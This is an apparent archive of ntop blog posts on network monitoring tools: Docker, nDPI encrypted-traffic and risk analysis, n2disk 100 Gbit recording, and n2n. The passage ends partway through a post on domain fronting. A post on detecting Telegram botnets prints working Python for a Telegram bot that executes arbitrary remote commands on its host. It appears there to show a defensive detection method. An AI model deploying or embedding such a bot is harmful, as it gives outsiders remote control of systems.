Using ntop tools (including PF_RING ZC) on Docker

May 13, 2020, 5:05 am

≫ Next: You’re invited to the future of nDPI: Python, Cybersecurity and Behaviour. May 15th, 4PM CET

≪ Previous: Trickbot Malware Analysis Using nDPI and ntopng

Software containers are an elegant way to deploy software applications. If you are wondering if ntop supports software containers the answer is yes. Whenever new stable versions of packages are built, containers hosted on hub.docker.com are automatically updated.

Instead if you want to build a custom container, you can use the docker files we maintain.

Container support is full, including PF_RING ZC that can natively run on Docker as specified in this document. using a simple command like

sudo docker run -v /dev/hugepages:/dev/hugepages --cap-add ipc_lock ubuntu18 pfcount -i zc:99@0

this without the complexity for instance of DPDK.

Note that you need one software license per physical host to give you the freedom to run multiple applications instances on Docker. You can read more here for details.

Enjoy!

↧

You’re invited to the future of nDPI: Python, Cybersecurity and Behaviour. May 15th, 4PM CET

May 14, 2020, 8:58 am

≫ Next: Webinar Invitation: Network Monitoring in Post-Lockdown Days (May 21st and May 26th)

≪ Previous: Using ntop tools (including PF_RING ZC) on Docker

Hi all, this is to invite you to an open discussion about nDPI, its future. In particular Python bindings, cybersecurity extensions and behaviour analysis. We will meet at 4PM CET (10AM EST) live on the Internet. This is the URL … Continue reading →

↧

Webinar Invitation: Network Monitoring in Post-Lockdown Days (May 21st and May 26th)

May 18, 2020, 2:38 pm

≫ Next: How Lockdown Changed Corporate Internet Connectivity

≪ Previous: You’re invited to the future of nDPI: Python, Cybersecurity and Behaviour. May 15th, 4PM CET

This is to invite our community to a new webinar that will explain how we have enhanced ntopng to take into account network monitoring challenges due to global lockdown. In particular we will show how ntopng can be integrated with VPN and remote access systems, as well commercial firewall and security devices. This is to create a single monitoring console able to offer visibility even when most users are roaming or work from remote. This webinar will be available online (no registration is necessary):

Italian Edition
Thursday May 21st, 17:00 CET
Webinar Link (Microsoft Teams): http://tiny.cc/rzkbpz
Calendal Event: Webinar May 21st
International Edition
Tuesday May 26th, 17:00 CET / 11 AM EST / 8 AM PST
Webinar Link (Microsoft Teams): http://tiny.cc/kb0bpz
Calendar Event: Intl Webinar May 26th

See you soon!

↧

How Lockdown Changed Corporate Internet Connectivity

May 21, 2020, 8:29 am

≫ Next: Why Behaviour Traffic Analysis is Good (was Encrypting TLS 1.3 Traffic)

≪ Previous: Webinar Invitation: Network Monitoring in Post-Lockdown Days (May 21st and May 26th)

Global lockdown has forced many people to work from remote: empty offices, all remote working until the emergency is over.

In essence during the lockdown remote workers used very few corporate services via VPN, with relatively light traffic (e.g. accounting) and the heavy videoconferencing traffic not propagating in the company networks: this as moderns videoconferencing solutions are all cloud based. So in essence moving to remote working has not put too much pressure on corporate networks beside the creation of VPN accounts or other limited changes.

As you can see the funny thing is the reverse transition. As the lockdown is now reduced in many regions and some people started to go back to work from office, we have decided to evaluate the impact of this change in corporate connectivity. In order to do this we have enhanced nDPI to support all the popular videoconferencing software including GoToMeeting, Webex, MS Teams, Zoom, Google Meet: this is in order to measure the bandwidth being used. In order to compare them, we have run a few tests in the same conditions (two users talking over the Internet with the same PC and camera) and the results are listed below (all values are expressed in Mbit and measured on one user’s side).

	Zoom	Webex	Teams	Skype	Meet
Audio Only	0.2	0.12	0.12	0.15	0.43
Audio+Video (local minified + remote big)	2.3	0.9	2.1	5	1,9
Audio+Video (local minified + remote application sharing)	0.5	0.4	1.4	2.9	0.96

As you can see with a pure video call, the bandwidth usage is high. Such bandwidth is then reduced when people share slides or non-moving pictures (in this case people images are minified and thus lighter in terms of bandwidth usage). Modern conferencing system are pretty efficient, others not that much, but in general audio calls are not a problem whereas when video (again with video we mean people cameras no screen sharing) is used, bandwidth consumption increases quite a bit. This scenario is not a problem from the corporate standpoint as videoconferencing systems do not load corporate Internet.

Unfortunately with the end of lockdown the situation is changing quite a bit as shown in the picture below: some people go back to work, and many others keep working from remote. Furthermore we have noticed that people are now using videoconferencing tools more often than before and often using cameras that make the overall experience more immersive and human-friendly. In essence the phone is no longer the main media, as it has been replaced by HD desktop conferencing tools (yes even the meeting room conferencing system is used very seldom as people prefer to stay at the desk when not too noisy, thus increasing the number of simultaneous conferences previously limited by the number of available conference rooms). The new scenario is depicted below.

This has created a few problems as the corporate Internet link is under pressure being it flooded by many simultaneous conferences no longer mitigated by the cloud. This is a problem that can be addressed either preventing people form using the cameras (only screen sharing is allowed) or increasing the corporate bandwidth with extra costs involved.

If you are wondering how is the bandwidth used, thanks to nDPI and ntopng you can now visualize the traffic with the pie charts you are already familiar with, and create long-term timeseries to understand how the traffic changed with respect to the pre-lockdown days.

From the network protocol standpoint, some videoconferencing protocols are pretty challenging. While Zoom and Webex are somehow “simple” to track, others such as Microsoft Teams are much more challenging. This is because Teams is a mix of various underlying network protocols ranging from Microsoft 365 (for calendar for instance) to Skype for audio and video communications. This is because Microsoft has acquired Skype some years ago, and apparently started to adopt Skype in Teams. So the big challenge has been to mark Skype as Teams when Teams is in use, and leave it as Skype when the consumer Skype app or Skype for Business are used. This said thanks to the latest nDPI extensions, all the leading videoconferencing protocols are now supported and marked properly so that you can enjoy timely protocol reports. Just make sure to update your ntop tools to the latest (nightly) version where all these changes have been incorporated.

Enjoy!

↧

Why Behaviour Traffic Analysis is Good (was Encrypting TLS 1.3 Traffic)

May 28, 2020, 3:29 pm

≫ Next: ntop Tools Taxonomy

≪ Previous: How Lockdown Changed Corporate Internet Connectivity

In the latest nDPI meetup, we have discussed future directions, including extending the current encrypted traffic analysis features. Currently nDPI supports both fingerprint and behaviour encrypted traffic analysis techniques to provide TLS traffic visibility. At ntop we have never liked too much fingerprinting techniques such as JA3 that are used by many popular IDSs and security tools, simply because they often lead to false positives making them a “nice to have” features but nothing more than that.

Recently the IETF is designing a new TLS 1.3 extension named ECHO (Encrypted Client Hello). In TLS 1.3 the only initial handshake message in cleartext is the Client Hello: it is quite important as it contains in cleartext the SNI (Server Name Indication), that is basically the name of the server the client is contacting. ECHO is trying to fix data disclosure, by sending this information encrypted so that a network monitoring tools will be unable to inspect traffic and see if we’re accessing maps.google.com instead of gmail.com. Although ECHO works with cleartext DNS, the idea of Firefox (to date the only browser supporting it) is to avoid any loss of metadata by forcing to use DoH, This is to prevent monitoring tools to see what site has been visited by looking at the DNS traffic. Note that the TLS client encrypts the data in ECHO using a public key that is placed in the DNS of the contacted host (it is stored in a TEXT record named _ensi.domainname). Example:

;; ANSWER SECTION:
_esni.hackthetower.it.	1800	IN	TXT	"/wHuOSrNACQAHQAgKO0MmMYpnkF3QL3YhV0AiwWoqqaTEHp7/lKIzBLLeS4AAhMBAQQAAAAAXsvrgAAAAABe09SAAAA="

In nDPI we support detection of encrypted SNI (ESNI).

TCP 192.168.1.12:49886 <-> 104.27.129.77:443 [proto: 91.220/TLS.Cloudflare][cat: Web/5][197 pkts/17789 bytes <-> 211 pkts/175194 bytes][Goodput ratio: 40/93][6.64 sec][ALPN: h2;http/1.1][TLS Supported Versions: TLSv1.3;TLSv1.2;TLSv1.1;TLSv1][bytes ratio: -0.816 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 28/26 1000/1000 139/134][Pkt Len c2s/s2c min/avg/max/stddev: 54/60 90/830 770/1506 77/677][TLSv1.3][JA3C: e5ef852e686954ba9fe060fbfa881e15][JA3S: eb1d94daa7e0344597e756a1fb6e7054][ESNI: 9624CB3C4E230827F78CF5BF640D22DEA33FCC598EA6A32D939905586FBE997B9E68661F8956D4893072E19DE24CD1FB88A9F71FC4CC01BAB5C914FDF96A647D671B5E89859BAEEAB122218688496DF4DF0C328C3D5F940B109CEB2A2743D5CBE3594288A229B8C7E2F88303E3FE1A26A89E5001F2BD936890FEF78F06E05ECC063A68BDB8C18DFAC114CF1FECDB8BE1FC2FEECB2315D27998D682B129FD1E3EB5D7985DCBDC452A1082CCC038E0BF69570FEFAC6BC6FB951F89B6792CADA76403C02CEB5DCE1CE6EDDD16D5F7FB6B85D2B92485448DE0088E421E83F1E28B267FBE3B59AE0496FB845213C271D4C5AC5E9E7E5F6A3072445307FCCEB7306710459991C40CC4DC1FC325154C7974DD780371397805456A19AE23EE88475C1DF07697B666][ESNI Cipher: TLS_AES_128_GCM_SHA256][Cipher: TLS_AES_128_GCM_SHA256]

ESNI is not very useful, and ancillary data such as record keys (used for encryption and places in DNS) are often updated every hour, making the record digest useless to identity the accessed web site (this is because it cannot be used as fingerprint for the contacted site).

You might ask yourself: is this the end of visibility and nDPI? While ECHO has definitively implications on traffic visibility this is not the case, and the reasons are manyfold:

ECHO will prevent TLS fingerprints to work, whereas behavior analysis will still work. This is good news for nDPI as we’re working since a few months to enhance behaviour traffic analysis and advertising to avoid using fingerprints as they might lead to false positives.
Operators and security teams can decide to block TLS traffic with these extensions as they prevent them from enforcing traffic policies.
ECHO is still in draft, so it’s not clear if it will be standardised in the current form.
While DoH is not mandatory for ECHO, blocking non-operator provided DoH (that nDPI can detect) servers, can mitigate loss of metadata. This means that traffic monitoring and security applications can still have enough hints on metadata leaking from the DNS queries.
Visibility of CDN-based traffic will be partially affected, this unless the IP address/port will disclose the nature of the traffic as most large companies do (e.g. https://docs.microsoft.com/en-us/office365/enterprise/urls-and-ip-address-ranges is used inside nDPI).
Malware will probably not use ECHO for a long time (today most malware are TLS 1.1 when not using HTTP). However, just to repeat it one more time, we believe that nDPI should detect malware using behavior analysis techniques rather than fingerprints.
To date the only browser supporting ESNI is Firefox with DoH enabled (https://encryptedsni.com),

In summary, expect in the next few years TLS to be completely encrypted and this is good news for the Internet, but not su good for monitoring and security tools. nDPI is already supporting ESNI, and we’ll do our best to keep it update with the latest TLS 1.3 extensions as they will be standardised. ECHO is not the end of TLS fingerprinting, but it can definitively be yet another good reason to look at TLS behaviour instead of limiting the analysis to fingerprint. Stay tuned for more news about using nDPI and encrypted traffic analysis.

Enjoy!

↧

ntop Tools Taxonomy

June 3, 2020, 5:26 am

≫ Next: Howto Identify and Block Telegram-based Botnets

≪ Previous: Why Behaviour Traffic Analysis is Good (was Encrypting TLS 1.3 Traffic)

As sometime people is confused about the various options ntopng tools offer, this post is an attempt to clarify them in a single page.

Use Case	Product
Collect flows (sFlow and/or NetFlow) and dump them to disk or send them to a remote collector	nProbe (any version). Better to use nProbe Pro if you have proprietary flows. Check the nProbe working modes.
Convert packet into flows	nProbe if you have <= 10 Gbit traffic or nProbe Cento at 10+ Gbit. Check the nProbe working modes.
Both collect and visualize flows on a web GUI	Use ntopng for visualisation and nProbe for flow collection. Check how to configure nProbe with ntopng.
Analyse network packets and create a web report	Use ntopng if you have a few Gbits of traffic. With more traffic use nProbe or nProbe Cento to convert packets into flows and use ntopng to collect them.
Dump traffic to disk	n2disk. Choose the version based on the network speed you are monitoring (1, 5, and 10+ Gbit). It is possible to integrate it with ntopng.
Mitigate network traffic attacks discarding bad traffic	nScrub. Choose the version based on the network speed and the number of hosts to protect.
Process traffic (<= 1 Gbit)	PF_RING community.
Process traffic (> 1 Gbit)	PF_RING ZC. Note that ntopng, nProbe and the other products need a PF_RING ZC license when operating with networks speeds 1 Gbit+

Enjoy!

↧

Howto Identify and Block Telegram-based Botnets

June 10, 2020, 1:23 am

≫ Next: Howto Build a 100 Gbit (Drop-Free) Continuous Packet Recorder using n2disk [Part 3]

≪ Previous: ntop Tools Taxonomy

Botnets are a popular way to run malware on a network using the command and control paradigm. Popular protocols used by botnets include IRC and HTTP. Most IDSs can detect bots as long as they can inspect the network traffic. This makes networks administrators blind when bots move to encrypted and cloud-based (i.e. that you cannot block with a simple IP-based ACL) protocols. The popular Telegram messaging system allows people to create a bot in minutes as shown in the code excerpt below.

bot = Bot(token)


def run():
    """ Runs the function used to start the bot.
    """

    MessageLoop(bot,
                { 'chat': on_chat_message }
                ).run_as_thread()

    print('Listening ...')

    while 1:
        time.sleep(10)

####################################################################

def help(bot, chat_id):
    bot.sendMessage(chat_id, 'Available commands:')
    bot.sendMessage(chat_id, '/exec    Execute remote command')

####################################################################

def run_command(command):
    p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return p.stdout.read().decode('utf-8')

####################################################################

def on_chat_message(msg):
    """ Manages the predefined commands of the telegram bot.

    :param msg: message received from telegram.
    """

    #print(msg)
    content_type, chat_type, chat_id = glance(msg)

    #
    # Check if the content_type of the message is a text
    if content_type == 'text':
        txt = msg['text'].lower()

        #
        # Switch construct to manage the various commands
        if txt.startswith("/exec"):
            cmd = txt[6:]
            bot.sendMessage(chat_id, 'Executing command ['+cmd+']...')
            bot.sendMessage(chat_id, run_command(cmd.split(' ')))
        else:
            help(bot, chat_id)

run()

As you can see you can start the bot on a remote system and execute arbitrary commands.

Suppose now that one of your coworker leaves this simple bot running behind a network. The firewall will see this traffic as TLS-like traffic on port 443 or with the and let it go.

As you can see from the above image, this Telegram traffic looks like TLS but it is not TLS where you can leverage detection on certificates, JA3 etc. You can imagine the consequences of having these simple tools running on a network. In essence your network is exposed, and firewalls, popular non-DPI based IDSs such as Suricata or Zeek cannot do much against this.

Fortunately nDPI can detect it

Detected protocols:
    Telegram             packets: 156           bytes: 44034         flows: 2            


Protocol statistics:
    Acceptable                   44034 bytes

    1	TCP 192.168.1.110:52671 <-> 149.154.167.91:443 [proto: 91.185/TLS.Telegram][cat: Chat/9][76 pkts/9307 bytes <-> 74 pkts/33973 bytes][Goodput ratio: 46/86][3.75 sec][bytes ratio: -0.570 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 58/59 1817/1852 264/272][Pkt Len c2s/s2c min/avg/max/stddev: 66/70 122/459 846/1294 133/446]
    2	TCP 192.168.1.110:52672 <-> 149.154.167.91:443 [proto: 91.185/TLS.Telegram][cat: Chat/9][4 pkts/445 bytes <-> 2 pkts/309 bytes][Goodput ratio: 38/55][0.07 sec][bytes ratio: 0.180 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/36 23/36 35/36 16/0][Pkt Len c2s/s2c min/avg/max/stddev: 66/74 111/154 235/235 72/80]

so all our ntop tools (e.g. ntopng, nprobe…. ) can handle that. Now you have realised that you are no longer bling, you have two options on the table

Visibility (for instance with ntopng)
Block this traffic using ntopng Edge.

In ntopng you have the ability to specify what protocols a certain device can run.

So you can generate an alert in case a critical host (e.g. a server) runs unwanted protocols, this including all those supported by nDPI hence including Telegram.

If you want to see more security-oriented alerts, you can customise the user scripts and enable those behavioural checks you are interested in.

We hope this can help to keep your network safe, and network administrators no longer blind.

Enjoy!

↧

Howto Build a 100 Gbit (Drop-Free) Continuous Packet Recorder using n2disk [Part 3]

June 15, 2020, 8:37 am

≫ Next: Introducing nDPI Risk Analysis for (Cybersecurity) Network Traffic Analysis (was Ripple20)

≪ Previous: Howto Identify and Block Telegram-based Botnets

In the first post of this series (part 1) we described how to build a 2×10 Gbit continuous packet recorder using n2disk and PF_RING, in the second post (part 2) we described what hardware is required to scale from 10 Gbit to 100 Gbit. One more year has past now and we matured more experience with 100 Gbit recording, it’s time to refresh the previous posts and share more information about the new capture and storage technologies and configurations in order to build a recorder able to dump 100+ Gbit line-rate small-packets sustained traffic.

For those reading about this topic for the first time, a continuous packet recorder is a device that captures raw traffic to disk continuously, similar to a CVR camera, providing a window into network history. This allows you, whenever a network event happens, to go back in time and analyse traffic up to the raw packet as it appeared on the wire (including headers and payload) to find what exactly caused a specific issue.

With n2disk, which is part of the ntop suite, it is possible to build such device and dump traffic using the standard PCAP format. Furthermore, by leveraging on the PF_RING acceleration, n2disk is able to capture, index and dump traffic from 1/10/100 Gbit links with no packet loss in any traffic condition. This year we released a new n2disk stable version 3.4, that besides adding new interesting features (including the ability to filter traffic based on the L7 application protocol), introduced major performance optimizations when running on top of FPGA-based NICs.

In this post we will focus on 100 Gbit recording, describing a hardware and software configuration that our users are successfully using in production environments.

Hardware Specs

Network Card

As already discussed in the previous post n2disk is able to capture traffic from many adapters thanks to the abstraction layer provided by the PF_RING modules. Based on the speed and features we need (and our budget) we can decide to go for a commodity adapter (e.g. Intel) or a specialised FPGA adapter (e.g. Napatech, Silicom/Fiberblaze).

There are a few commodity adapters with 100 Gbit connectivity on the market, however they are usually not able to cope with full 100 Gbit throughput in any traffic condition (e.g. small packets) even using accelerated drivers, when it comes to dump traffic to disk. The main reason is that in this case we cannot use technologies like RSS to spread the load across multiple streams, as this would shuffle packets (coming from different streams) to disk, and we need to preserve packet order to provide evidence of a network event. Please note that using multiple streams is still an option if we have a way for sorting packets (e.g. hardware timestamps with high precision) which is usually not the case with commodity adapters.

FPGA adapters provide support for moving packets in big chunks, delivering high throughput to applications like n2disk, without the need of using multiple streams in most cases (in our experience n2disk is able to handle up to ~50 Gbps with a single stream). In this post we will use the Napatech NT200A02 adapter as reference for the configuration, however other options are also supported like the Silicom/Fiberblaze.

Storage

When it comes to select a fast storage, the word “Raid” immediately jumps to our mind. A good Raid controller (e.g. with 2 GB of onboard buffer) with a few disks in a Raid 0 configuration can increase the I/O throughput up to 40+ Gbps. However this is not enough to handle 100 Gbps. If we need quite some data retention time, and rack space is not a problem, we can probably use a few Raid controllers and many HDD or SSD disks to distribute the load and reach the desired throughput.

A better option could be using NVMe disks. Those disks are fast SSDs directly connected to the PCIe bus. Since they are fast, they do not even require a Raid controller (actually a standard SATA/SAS controller cannot drive them) and it is possible to leverage on the multithreaded dump capability of n2disk to directly write in parallel to many of them and dramatically increase the dump throughput.

The throughput we’ve been able to achieve with n2disk using Intel NVMe disks from the P4500/P4600 series is ~20 Gbps per disk. This means that 8 disks are enough for recording traffic at 100 Gbps. Please make sure that you select write-intensive disks that guarantee enough endurance time.

CPU

FPGA adapters are able to aggregate traffic in hardware and distribute the load across multiple streams. As said before, n2disk is able to handle up to ~50 Gbps with a single capture thread/core and a single data stream. If we use a 3+ Ghz Xeon Gold CPU, at 50 Gbps n2disk requires 3/4 cores for indexing traffic. One more core is required for the threads dumping traffic to disk, for a total of 6 cores.

If we want to handle 100 Gbps traffic, we should use 2 streams, with one n2disk instance each, thus a 3+ Ghz Xeon Gold with at least 12 cores is required. An Intel Xeon Gold 6246 is an example as minimum requirement at this speed. If you go for a NUMA system (multiple CPUs) please pay attention to the CPU affinity as already discussed in the previous posts! Please also make sure you configure the system with enough memory modules to use all memory channels (check the CPU specs for this) and with the maximum supported frequency.

Software Configuration

Data Stream Configuration

In order to run n2disk on Napatech or other FPGAs with the best performance, the adapter need to be properly configured. Support for chunk mode, PCAP format, nanosecond timestamps, need to be enabled in the configuration the under /opt/napatech3/config/ntservice.ini as described in the n2disk user’s guide. Please find below the parameters that you usually need to change:

[System]
TimestampFormat = PCAP_NS
[Adapter0]
HostBufferSegmentSizeRx = 4
HostBuffersRx = [4,128,0]
MaxFrameSize = 1518
PacketDescriptor = PCAP

If a single data stream is enough, no additional configuration is required as it is possible to capture directly from an interface (e.g. nt:0 for port 0). If a single data stream is not enough as the traffic throughput exceeds 50 Gbps, multiple streams need to be configured using the ntpl tool as in the example below. In the example below traffic is load-balanced to two streams using a 5-tuple hash function. Each stream can be selected by capturing from nt:stream<id> (e.g. nt:stream0 for stream 0).

/opt/napatech3/bin/ntpl -e "Delete=All"
/opt/napatech3/bin/ntpl -e "HashMode = Hash5TupleSorted"
/opt/napatech3/bin/ntpl -e "Setup[NUMANode=0]=Streamid==(0..1)"
/opt/napatech3/bin/ntpl -e "Assign[streamid=(0..1)] = All"

n2disk Configuration

A good n2disk setup is also really important in order to achieve the best dump performance. The tuning section of the n2disk user’s guide contains basic guidelines for properly configuring dump settings, CPU core affinity, indexing, etc.

In this example we are capturing 100 Gbps traffic divided into two streams by means of two n2disk instances, which should handle a maximum throughput of 50 Gbps each. Traffic is stored in PCAP files across multiple NVMe disks in round-robin. As we’ve seen before, each NVMe disk has a max sustained IO throughput of 20 Gbps, thus 4 disks for each n2disk instance will be used.

Please note that dumped traffic can be later on extracted seamlessly from all NVMe disks by selecting all timelines generated by the n2disk instances as data source in the npcapextract extraction tool. Please find below the configuration file for the first n2disk instance, with some comment describing what each instance is supposed to do.

# Capture interface
-i=nt:stream0
# Disk space limit
--disk-limit=80%
# Storages (NVMe disks 1, 2, 3, 4)
-o=/storage1
-o=/storage2
-o=/storage3
-o=/storage4
# Max PCAP file size
-p=2048
# In-memory buffer size
-b=16384
# Chunk size
-C=16384
# Index and timeline
-A=/storage1
-I
-Z
# Capture thread core affinity
-c=0
# Writer thread core affinity
-w=22,22,22,22
# Indexing threads core affinity
-z=4,6,8,10

Please find below the configuration file for the second n2disk instance, which is similar to the previous one. It is important here to pay attention to the CPU affinity to avoid using the same cores twice (including logical cores using hyperthreading) affecting the performance.

-i=nt:stream1
--disk-limit=80%
-o=/storage5
-o=/storage6
-o=/storage7
-o=/storage8
-p=2048
-b=16384
-C=16384
-A=/storage5
-I
-Z
-c=2
-w=46,46,46,46
-z=12,14,16,18

At this point we are ready to start the two n2disk instances. The chart below shows the CPU cores utilisation while capturing, indexing and dumping sustained 100 Gbps traffic (64-byte packets) continuously.

Now you have all the ingredients to build your 100 Gbps traffic recorder.

Enjoy!

↧

Introducing nDPI Risk Analysis for (Cybersecurity) Network Traffic Analysis (was Ripple20)

July 1, 2020, 2:05 am

≫ Next: July 16th and 24th: Community Meeting and Webinar Announcement

≪ Previous: Howto Build a 100 Gbit (Drop-Free) Continuous Packet Recorder using n2disk [Part 3]

Earlier last month Ripple20 became popular as it has listed some vulnerabilities found in a custom IP stack used by many IoT devices. Despite the hype on Ripple20, in essence the tool used to fingerprint vulnerable devices sends either malformed or valid (with some values in the allowed range albeit with values deprecated or obsolete) packets that are easy to catch (see Suricata and Zeek rules for detection). In essence IDS rules/scripts are checking whether packets sent on the wire are valid or if they contain unexpected values used by Ripple20. Note that these rules are NOT checking packets in general (for instance check if the TLS header is valid, or if ICMP packets contain valid type/code that are not deprecated) but they are designed to spot only Ripple20, so if a future Ripple21 will use the same method but a different value, we’ll be back to square one and new set or rules/scripts will need to be defined. This is how signature-based system work, and as you can see they are easy to circumvent making little changes in network traffic, not to mention that constantly adding new rules/scripts will make these systems slow.

In order to have a more general solution to this problem, we have decided to introduce in nDPI (and thus on all applications that use it) a new type of analysis we have named “risk factor” that analyses the traffic and produces a bitmap of issues found on traffic. This of course not based on signatures/scripts to be prepared to catch Ripple21 if/when will be disclosed. In essence nDPI when dissecting traffic, will also evaluate some risks and report them to the application using it, this in addition to the application protocol. This mechanism is extensible and we are constantly adding new values to make it more pervasive. Applications using nDPI can use the risk factor to block or issue an alert, this without having to implement complex detection methods as nDPI has already done everything. As of today nDPI is able to detect the following issues:

XSS (Cross Site Scripting)
SQL Injection
Arbitrary Code Injection/Execution
Binary/.exe application transfer (e.g. in HTTP)
Known protocol on non standard port
TLS self-signed certificate
TLS obsolete version
TLS weak cipher
TLS certificate expired
TLS certificate mismatch
HTTP suspicious user-agent
HTTP numeric IP host contacted
HTTP suspicious URL
HTTP suspicious protocol header
TLS connections not carrying HTTPS (e.g. a VPN over TLS)
Suspicious DGA domain contacted
Malformed packet (Ripple20 is detected here)

If your nDPI-based application can assign a score to the above risks, you have already spotted most of the problems that IDSs detect, this without the headache of constantly updating rules/scripts. For instance in this pcap, a malware is transferring a binary application (.exe) as PNG file, this to avoid security policies.

As you can see int he above picture, ntopng (that uses nDPI and so that is beneficing from this traffic analysis without having to implement anything but just to interpret the risk factor reported by nDPI) reports this issue and triggers an alert. Simple and effective isn’t it?

Enjoy!

↧

July 16th and 24th: Community Meeting and Webinar Announcement

July 14, 2020, 6:03 am

≫ Next: Mice and Elephants: HowTo Detect and Monitor Periodic Traffic

≪ Previous: Introducing nDPI Risk Analysis for (Cybersecurity) Network Traffic Analysis (was Ripple20)

This month we’ll meet our community in two different events:

When: Thursday, July 16th, 16:00 CET / 10 AM EST
What: Live community meeting
Where: Discord. You can read more here how to join on the public ntop voice channel for this live event.
Abstract: Recently we have started to use discord as platform for interacting with our community in addition to telegram. The advantage of discord is the ability to combine text/voice/screen sharing so that we want to make an experiment, meet our users, let discuss with them, provide support. The idea is to have an informal discussion with our users in an informal way (no webinar format).
When: Friday, July 24th, 16:00 CET / 10 AM EST
Webinar Title: How to Write an ntopng Plugin for Flow Risks Analysis
Where: Microsoft Teams
Abstract: Recently, we have introduced the “Risk Factor” in nDPI, a new way to analyse traffic and simultaneously detect risks associated to each flow. Risks include, but are not limited to, Cross-Site Scripting (XSS), SQL injections (SQLi), Remote Code Execution (RCE) and issues with the TLS. In this workshop, we will see how to create an ntopng Lua plugin which leverages the nDPI “Risk Factor” to generate alerts opportunely update the ‘score’ indicator of compromise for hosts and flows. Intended audience is practitioners with minimal scripting skills. By the end of the workshop, participants will have sufficient skills and understanding necessary to extend ntopng with custom plugins.

↧

Mice and Elephants: HowTo Detect and Monitor Periodic Traffic

August 4, 2020, 7:41 am

≫ Next: Introducing n2n 2.8: Modern Crypto and Data Compression

≪ Previous: July 16th and 24th: Community Meeting and Webinar Announcement

Most people are used to top X: top senders, top receivers, top protocols. So in essence they are looking for elephants. While this is a good practice, mice are also very interesting as they can often be hidden in the noise. In cybersecurity noise is very good for attackers as they often try to hide themselves on it; this is in order to escape security. Many malware are programmed on a for loop fashion: do a), do b) do c) then go back to a) on an infinite loop. In essence this is a periodic activity that is worth to be investigated (see similar studies on this subject [1], [2], [3], [4]), but the standard top X analysis tools fall short in detecting it, so we need something more sophisticated. For this reason we have implemented a new feature in ntopng that can detect this behaviour and many other things.

In order to enable this feature, you need a recent version of ntopng (this feature is present only in the pro/enterprise edition dev builds and it will be integrated int he next stable release), and enable the corresponding preference.

then you need to restart ntopng and wait until it detects some periodic behaviour is detected.

How Periodic Traffic Detection Works

A traffic is considered to be periodic if it repeats regularly over time with a specified frequency. Periodicity is not computed at flow level as ephemeral ports will jeopardise the work, but on a triplet <L4 protocol, IP source, IP destination/SNI>. In particular the SNI is very relevant to detect periodicity on cloud services where the same SNI is served by different server IP addresses. In order to avoid generating too much noise, multicast and broadcast destination IP addresses are ignored as in LANs there are many periodic services that might confuse network analysts. ntopng accounts triplets and determines the frequency based on the flow creation time. Some flows can have a frequency of 1 minute, others of one hour: ntopng will detect it automatically without people having to configure anything. Little frequency drifts are handled automatically and accounted by ntopng.

A triplet is marked as periodic with a given frequency, if ntopng has been able to observe it at least 3 times with a stable frequency (i.e. if the frequency is 1 hour you need to wait about 3 hours before ntopng reports you anything). In order to limit memory usage, ntopng accounts periodicities up to one hour but future versions can raise this limit that is set only to limit memory usage and not an algorithm limitation. If ntopng detects periodic traffic, this information is reported on the user interface under the interface page

As you can see the application protocol, ports and frequency are reported.

Using Periodicity to Detect Threats

Not that you know more about periodic traffic you might wonder if this is just curiosity or more than that. Have a look at these two images below.

Let’s analyse the SSH traffic to see what is happening. As you can see ntopng has detected periodic communications that we pretty suspicious. this in particular if you look at the SSH ports, some of which are not standard. They can hide monitoring applications or other some kind of nasty behaviour

Interesting information can also come from Unknown periodic traffic (you could do the same looking at other protocols such as IRC for instance that are often used by malwares) is is very suspicious.

We hope you can find interesting insights on your network using this new feature. We plan to extend it with alerts, that can help network analysts to do in-depth analysis without having to deep dive into periodic data that can be pretty large for a big network.

Enjoy!

↧

Introducing n2n 2.8: Modern Crypto and Data Compression

August 12, 2020, 3:41 am

≫ Next: How to Detect Domain Hiding (a.k.a. as Domain Fronting)

≪ Previous: Mice and Elephants: HowTo Detect and Monitor Periodic Traffic

This is to announce the release of n2n 2.8 stable. This release brings significant new features to n2n’s crypto world and offers some compression opportunities. Overall n2n performance has been greatly enhanced, reduced bandwidth usage thanks to data compression, and as state of the art security with new crypto options. The added support for routing table manipulation might increase comfort. Besides further honing existing features, this release addresses some bugs.

New Features

Two lightweight stream ciphers: ChaCha20 (optional, through OpenSSL) & SPECK (integrated)
Full Header Encryption (including packet checksumming as well as replay protection)
A callback interface to better integrate n2n in third party software (you can still use it stand-alone)
Enable the integrated LZO1x compression
Add optional ZSTD compression (through zstdlib)
Support for changing system routes at program start and end
User and group id parameter for supernode
Application of cryptography in n2n is separately documented
Add a new pseudo random number generator with higher periodicity seeded with more entropy if available
Android users can use the hin2n to use it on their mobile phones.

Improvements

Have AES and ChaCha20 use OpenSSL’s evp_* interface to make better use of available hardware acceleration
Fix invalid sendto when supernode name resolution fails
Update to supernode’s purge logic
Extended management supernode’s port output
Fix read tap device failed when OS wakes up from sleep
Free choice of supernode’s management UDP port (for multiple supernodes on one machine)
Additional trace messages to better indicate established connections and connection type
Fix edge’s register-to-supernode loop
Remove redundant code
Restructure the code in directories
Clean-up platform-dependant code
Compile fixes for Windows
Fix build warnings
…and many more under-the-hood fixes and tunings

Now we can plan for v3 on a building block that is rock solid and efficient. Many thanks to Logan oos Even who has contributed to many of the 2.8 features.

Enjoy!

↧

How to Detect Domain Hiding (a.k.a. as Domain Fronting)

August 19, 2020, 1:57 pm

≫ Next: Introducing PF_RING ZC support for Intel E810-based 100G adapters

≪ Previous: Introducing n2n 2.8: Modern Crypto and Data Compression

Domain fronting is a technique that was used in 2010s by mobile apps to attempt to bypass censorship. The technique relies on a “front” legitimate domain that basically acts as a pivot for the forbidden domain. In essence an attacker performs a HTTPS connection where in the DNS (used to resolve the domain name) and TLS SNI the legitimate domain name is used, whereas inside the HTTP connection in the “Host” HTTP header it specifies the forbidden domain

Recently at DEF CON 28 a new tool named Noctilucent has been demonstrated. This tool revamped the domain fronting technique by exploiting TLS 1.3 ESNI (Encrypted SNI) for bypassing censorship. This new tool used ESNI (that is encrypted, contrary to the SNI that is in clear text) to specify a domain name different from the SNI. Example: SNI contains allowed.example, while ESNI (and the HTTP Host header) contains forbidden.example. In essence the ESNI obfuscates the real domain of an HTTPS connection and thus it can be used to circumvent security policies

